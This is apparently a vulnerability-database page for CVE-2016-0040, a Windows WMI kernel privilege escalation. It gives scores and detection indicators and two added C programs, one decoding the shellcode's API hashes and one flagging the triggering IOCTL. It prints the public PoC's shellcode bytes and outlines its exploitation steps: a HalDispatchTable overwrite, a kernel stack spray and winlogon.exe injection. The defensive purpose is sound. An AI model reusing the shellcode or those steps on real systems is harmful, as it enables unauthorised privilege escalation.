CVE-2016-0040
published 2016-02-10


Priority P1 (79) · Severity high · CVSS 3.1 base score 7.8
Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Tags: KEV · ITW · EXPLOIT
CISA Known Exploited Vulnerability, due 2022-04-18
Exploited in the wild
EPSS: 24.55% (97.6th percentile)
The kernel in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, and Windows 7 SP1 allows local users to gain privileges via a crafted application, aka "Windows Elevation of Privilege Vulnerability."

Affected

1 range

Vendor    | Product             | Version range | Fixed in
microsoft | windows_server_2008 |               |

Only one product range is listed here; the description above covers Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, and Windows 7 SP1 as well, so do not scope detection or patch checks to this single entry.

Detection & IOCs (extracted from sources)

path:    \\.\WMIDataDevice
other:   IOCTL_WMI_RECEIVE_NOTIFICATIONS = CTL_CODE(FILE_DEVICE_UNKNOWN, 0x51, METHOD_BUFFERED, FILE_WRITE_ACCESS) (evaluates to 0x00228144)
path:    data/exploits/CVE-2016-0040/CVE-2016-0040.x64.dll
command: RECEIVE_ACTION_CREATE_THREAD (value: 2)
bytes (x86 shellcode):
\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x6d\x64\x2e\x65\x78\x65\x00
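The shellcode bytes above resolve their imports by hash rather than by name: the prologue is the Metasploit x86 api_call stub (a 13-bit rotate-and-add over the uppercased UTF-16 module name including its terminating NUL, plus the same over the ASCII export name, summed modulo 2^32), so the 32-bit immediates placed before each `call ebp` identify the APIs, and the string after the final call is the stub's inline data. The C program below is an added example, not code from the page's sources or from the Metasploit module: it re-implements that hash, scans the page's bytes for the `push imm32 ; call ebp` and `mov ebx, imm32` patterns, names each hit against a small candidate list of my own choosing, and recovers the trailing command string. The pattern scan is a heuristic rather than a disassembler, so on other payloads it can mis-fire on immediates that happen to look like those opcodes.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The shellcode bytes listed on this page, as a C literal. The literal's own trailing
 * NUL is excluded from SHELLCODE_LEN; the payload's "cmd.exe\0" terminator is kept. */
static const unsigned char SHELLCODE[] =
    "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14"
    "\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d"
    "\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a"
    "\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff"
    "\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
    "\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44"
    "\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x6a\x01\x8d"
    "\x85\xb9\x00\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x68\xa6\x95"
    "\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"
    "\xff\xd5\x63\x6d\x64\x2e\x65\x78\x65\x00";
#define SHELLCODE_LEN (sizeof SHELLCODE - 1)

static uint32_t ror13(uint32_t v) { return (v >> 13) | (v << 19); }

/* Module half of the hash. The stub walks BaseDllName for MaximumLength bytes, i.e. the
 * UTF-16LE name plus its terminating wide NUL, uppercasing each byte in the 'a'..0x7f range
 * (its compare is signed, so bytes >= 0x80 are left alone). */
static uint32_t hash_module(const char *name)
{
    uint32_t h = 0;
    for (const unsigned char *p = (const unsigned char *)name;; p++) {
        unsigned c = *p;
        if (c >= 'a' && c < 0x80) c -= 0x20;
        h = ror13(h) + c;   /* low byte of the wide character */
        h = ror13(h);       /* high byte, always 0 for an ASCII name */
        if (c == 0) break;
    }
    return h;
}

/* Export half: ASCII bytes of the export name up to and including the NUL. */
static uint32_t hash_function(const char *name)
{
    uint32_t h = 0;
    for (const unsigned char *p = (const unsigned char *)name;; p++) {
        h = ror13(h) + *p;
        if (*p == 0) break;
    }
    return h;
}

/* Full api_call hash: module hash + export hash, wrapping mod 2^32. */
uint32_t api_hash(const char *module, const char *function)
{
    return hash_module(module) + hash_function(function);
}

/* Candidate (module, export) pairs to try; extend for other payload families. */
static const struct { const char *module, *function; } CANDIDATES[] = {
    {"kernel32.dll", "WinExec"},      {"kernel32.dll", "GetVersion"},
    {"kernel32.dll", "ExitThread"},   {"kernel32.dll", "ExitProcess"},
    {"kernel32.dll", "LoadLibraryA"}, {"kernel32.dll", "CreateProcessA"},
    {"kernel32.dll", "VirtualAlloc"}, {"ntdll.dll",     "RtlExitUserThread"},
};

const char *resolve_api_hash(uint32_t h)
{
    for (size_t i = 0; i < sizeof CANDIDATES / sizeof CANDIDATES[0]; i++)
        if (api_hash(CANDIDATES[i].module, CANDIDATES[i].function) == h)
            return CANDIDATES[i].function;
    return NULL;
}

struct api_ref { size_t offset; uint32_t hash; const char *name; };

/* Heuristic scan for "push imm32 ; call ebp" (68 .. .. .. .. ff d5) and "mov ebx, imm32"
 * (bb .. .. .. ..); matched instructions are skipped whole so their immediates are not rescanned. */
size_t find_api_refs(const unsigned char *sc, size_t len, struct api_ref *out, size_t max_out)
{
    size_t n = 0, i = 0;
    while (i + 5 <= len && n < max_out) {
        uint32_t imm = (uint32_t)sc[i + 1] | (uint32_t)sc[i + 2] << 8 |
                       (uint32_t)sc[i + 3] << 16 | (uint32_t)sc[i + 4] << 24;
        size_t step = 1;
        if (sc[i] == 0x68 && i + 7 <= len && sc[i + 5] == 0xFF && sc[i + 6] == 0xD5) step = 7;
        else if (sc[i] == 0xBB) step = 5;
        if (step > 1) { out[n].offset = i; out[n].hash = imm; out[n].name = resolve_api_hash(imm); n++; }
        i += step;
    }
    return n;
}

/* Whatever follows the last "call ebp" is inline data; for an exec-style stub, the command. */
const char *trailing_command(const unsigned char *sc, size_t len)
{
    for (size_t i = len; i >= 2; i--)
        if (sc[i - 2] == 0xFF && sc[i - 1] == 0xD5 && memchr(sc + i, 0, len - i))
            return (const char *)(sc + i);
    return NULL;
}

/* Accessors over the embedded sample so individual results can be checked by name. */
static size_t nth_ref(size_t k, struct api_ref *out)
{
    struct api_ref r[16];
    size_t n = find_api_refs(SHELLCODE, SHELLCODE_LEN, r, 16);
    if (k < n) *out = r[k];
    return n;
}
size_t sample_ref_count(void) { struct api_ref t; return nth_ref(0, &t); }
uint32_t sample_ref_hash(size_t k) { struct api_ref t = {0, 0, NULL}; nth_ref(k, &t); return t.hash; }
const char *sample_ref_name(size_t k) { struct api_ref t = {0, 0, NULL}; nth_ref(k, &t); return t.name ? t.name : "?"; }

int main(void)
{
    struct api_ref r[16];
    size_t n = find_api_refs(SHELLCODE, SHELLCODE_LEN, r, 16);
    for (size_t i = 0; i < n; i++)
        printf("offset %3zu  hash 0x%08x  %s\n", r[i].offset, (unsigned)r[i].hash, r[i].name ? r[i].name : "?");
    const char *cmd = trailing_command(SHELLCODE, SHELLCODE_LEN);
    printf("trailing string: %s\n", cmd ? cmd : "(none)");
    return 0;
}
```

Run against the page's bytes it reports four references in order: WinExec, ExitThread, GetVersion, RtlExitUserThread, followed by the string "cmd.exe", which is exactly the windows/exec pattern (WinExec on the inline command, then a version-dependent thread exit) rather than anything that itself touches winlogon.exe; the winlogon injection described below is the PoC's delivery step around this stub.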
  • Monitor DeviceIoControl calls on a WMIDataDevice handle carrying IOCTL_WMI_RECEIVE_NOTIFICATIONS. The definition above uses function number 0x51; the full control code a trace records is 0x00228144 (FILE_DEVICE_UNKNOWN 0x22 << 16, FILE_WRITE_ACCESS << 14, 0x51 << 2, METHOD_BUFFERED), so match on that value rather than on 0x51. This is the IOCTL that reaches the uninitialized stack variable in ntoskrnl's WMI subsystem. The WMI service itself uses this IOCTL legitimately, so filter on the calling process.
  • Detect processes other than SYSTEM and the WMI service opening a handle to \\.\WMIDataDevice with GENERIC_READ | GENERIC_WRITE, especially when a DeviceIoControl follows on that handle.
  • The Metasploit module injects a DLL named CVE-2016-0040.x64.dll into a freshly spawned notepad.exe. Detect reflective DLL injection into notepad.exe; the DLL name can also be hunted for in memory, and on disk in case an operator dropped it, though reflective loading leaves nothing on disk by itself.
  • The bug is an uninitialized stack variable in the WMI subsystem of ntoskrnl. Alert on unexpected kernel-mode code execution originating from the WMI receive-notification path on Windows 7 SP0/SP1 x64.
  • The x86 PoC allocates executable memory at the fixed virtual address 0x2a000000 (VirtualAlloc with MEM_COMMIT | MEM_RESERVE and PAGE_EXECUTE_READWRITE). Detect RWX allocations requested at that fixed base from user-mode processes; ordinary code lets the allocator choose the address.
  • The x86 PoC uses ZwMapUserPhysicalPages (exported by ntdll) to spray the kernel stack with a controlled value derived from HalDispatchTable. Monitor for calls to ZwMapUserPhysicalPages from non-system processes; ordinary applications rarely use it.
  • The shellcode carried by the x86 PoC (the bytes above) is a WinExec("cmd.exe") stub; the PoC delivers it by injecting into winlogon.exe with CreateRemoteThread. Detect CreateRemoteThread calls targeting winlogon.exe from unprivileged processes.
  • The Metasploit module targets only Windows 7 SP0 and SP1 x64; running it from a WOW64 (32-bit) session on a 64-bit OS is not supported and fails.
  • The x86 PoC (EDB-40039) overwrites the HalDispatchTable entry for HaliQuerySystemInformation and never restores it, so the host will BSOD at some point after exploitation; an unexplained bugcheck on a host that also shows the indicators above helps distinguish attempted exploitation from normal activity.
  • The Metasploit module requires an existing Meterpreter session and aborts if that session already runs as SYSTEM.
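The first two bullets are easiest to act on once the control code is written the way a trace records it. The C program below is an added example, not code from the page's sources, the Metasploit module or any product: it expands the page's CTL_CODE definition to the value DeviceIoControl actually carries, decodes a control code back into its CTL_CODE fields, and runs the two rules over a few constructed DeviceIoControl events in a hypothetical event layout (the struct, the process names, the is_system flag and the access masks are made up for the example; the Windows constants are the real ones).

```c
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constants from winioctl.h / ntddk.h, with the values Windows defines. */
#define FILE_DEVICE_UNKNOWN 0x00000022u
#define METHOD_BUFFERED     0u
#define FILE_WRITE_ACCESS   0x0002u
#define GENERIC_READ        0x80000000u
#define GENERIC_WRITE       0x40000000u

/* The Windows CTL_CODE macro: DeviceType<<16 | Access<<14 | Function<<2 | Method. */
#define CTL_CODE(DeviceType, Function, Method, Access) \
    (((uint32_t)(DeviceType) << 16) | ((uint32_t)(Access) << 14) | \
     ((uint32_t)(Function) << 2) | (uint32_t)(Method))

/* The page's definition; the value a DeviceIoControl trace records is 0x00228144. */
#define IOCTL_WMI_RECEIVE_NOTIFICATIONS \
    CTL_CODE(FILE_DEVICE_UNKNOWN, 0x51, METHOD_BUFFERED, FILE_WRITE_ACCESS)

struct ioctl_fields { uint32_t device_type, access, function, method; };

/* Split a control code back into its CTL_CODE fields. */
struct ioctl_fields decode_ioctl(uint32_t code)
{
    struct ioctl_fields f;
    f.device_type = (code >> 16) & 0xFFFFu;
    f.access      = (code >> 14) & 0x3u;
    f.function    = (code >> 2)  & 0xFFFu;
    f.method      =  code        & 0x3u;
    return f;
}

/* Hypothetical DeviceIoControl event layout (not any real product's schema). */
struct ioctl_event {
    const char *image;          /* process image name */
    int         is_system;      /* 1 for SYSTEM or the WMI service itself */
    const char *device;         /* handle path, Win32 (\\.\X) or NT (\Device\X) form */
    uint32_t    desired_access; /* access mask requested when the handle was opened */
    uint32_t    ioctl;          /* control code passed to DeviceIoControl */
};

/* Match "\\.\WMIDataDevice" or "\Device\WMIDataDevice" regardless of case. */
static int is_wmidatadevice(const char *path)
{
    const char *tail = "WMIDataDevice";
    size_t lp = strlen(path), lt = strlen(tail);
    if (lp < lt) return 0;
    for (size_t i = 0; i < lt; i++)
        if (tolower((unsigned char)path[lp - lt + i]) != tolower((unsigned char)tail[i]))
            return 0;
    return 1;
}

/* 0 = benign, 1 = precursor (read/write handle from a non-system process),
 * 2 = trigger (IOCTL_WMI_RECEIVE_NOTIFICATIONS from a non-system process). */
int classify_ioctl_event(const struct ioctl_event *e)
{
    if (!is_wmidatadevice(e->device)) return 0;
    if (e->is_system) return 0;   /* the WMI service issues this IOCTL legitimately */
    if (e->ioctl == IOCTL_WMI_RECEIVE_NOTIFICATIONS) return 2;
    if ((e->desired_access & (GENERIC_READ | GENERIC_WRITE)) == (GENERIC_READ | GENERIC_WRITE))
        return 1;
    return 0;
}

/* Run both rules over constructed events and return the number of trigger-level hits. */
int run_sample_detection(void)
{
    const struct ioctl_event sample[] = {   /* constructed for this example, not a real trace */
        {"svchost.exe", 1, "\\Device\\WMIDataDevice", GENERIC_READ | GENERIC_WRITE, IOCTL_WMI_RECEIVE_NOTIFICATIONS},
        {"poc.exe",     0, "\\\\.\\WMIDataDevice",    GENERIC_READ | GENERIC_WRITE, IOCTL_WMI_RECEIVE_NOTIFICATIONS},
        {"recon.exe",   0, "\\Device\\WMIDataDevice", GENERIC_READ | GENERIC_WRITE,
                           CTL_CODE(FILE_DEVICE_UNKNOWN, 0x01, METHOD_BUFFERED, FILE_WRITE_ACCESS)},
        {"notepad.exe", 0, "\\\\.\\NUL",              GENERIC_READ | GENERIC_WRITE, IOCTL_WMI_RECEIVE_NOTIFICATIONS},
    };
    int hits = 0;
    for (size_t i = 0; i < sizeof sample / sizeof sample[0]; i++) {
        int level = classify_ioctl_event(&sample[i]);
        printf("%-12s %-24s ioctl=0x%08x -> level %d\n", sample[i].image, sample[i].device,
               (unsigned)sample[i].ioctl, level);
        if (level == 2) hits++;
    }
    return hits;
}

int main(void)
{
    struct ioctl_fields f = decode_ioctl(IOCTL_WMI_RECEIVE_NOTIFICATIONS);
    printf("IOCTL_WMI_RECEIVE_NOTIFICATIONS = 0x%08x (type 0x%x, function 0x%x, method %u, access %u)\n",
           (unsigned)IOCTL_WMI_RECEIVE_NOTIFICATIONS, (unsigned)f.device_type, (unsigned)f.function,
           (unsigned)f.method, (unsigned)f.access);
    return run_sample_detection() == 1 ? 0 : 1;
}
```

Of the four constructed events only poc.exe reaches trigger level: the svchost.exe event is the WMI service doing its normal job and is excluded by the system/WMI filter the page's second bullet asks for, recon.exe only has the read/write handle and is reported as a precursor, and notepad.exe sends the right code to the wrong device. A log source that records control codes will show 0x228144, not 0x51.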

CVSS provenance

Source    | Version | Score | Severity | Vector
nvd       | v3.1    | 7.8   | HIGH     | CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
nvd       | v2.0    | 7.2   | HIGH     | AV:L/AC:L/Au:N/C:C/I:C/A:C
vulncheck |         | 7.8   | HIGH     |
cisa      |         | 7.8   | HIGH     |